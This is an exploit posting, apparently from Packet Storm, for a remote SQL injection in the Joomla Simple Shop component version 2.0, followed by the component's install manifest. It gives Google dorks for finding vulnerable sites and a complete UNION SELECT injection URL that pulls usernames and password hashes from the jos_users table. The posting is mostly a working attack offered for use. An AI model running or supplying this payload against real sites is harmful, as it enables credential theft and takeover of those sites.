The Joomla Simple Shop component version 2.0 suffers from a remote SQL injection vulnerability.
983b16faa568acc5fce517df5f4a9277ca0729fe8b870e8abd94439f91697cff###############################################################
#
# joomla com_simpleshop SQL Injection(section)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl:"com_simpleshop"
#
# DORK 2 : allinurl: "com_simpleshop"section
#
################################################################
EXPLOIT :
index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section§ion=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*
################################################################
# S@BUN i AM NOT HACKER S@BUN
################################################################
<mosinstall type="component" version="4.5.2">
<name>simple shop</name>
<author>galore.co.za</author>
<creationDate>July 2007</creationDate>
<copyright>(C) 2000 - 2007 galore.co.za</copyright>
<license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>
<authorEmail>info@galore.co.za</authorEmail>
<authorUrl>www.galore.co.za</authorUrl>
<version>2.0</version>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed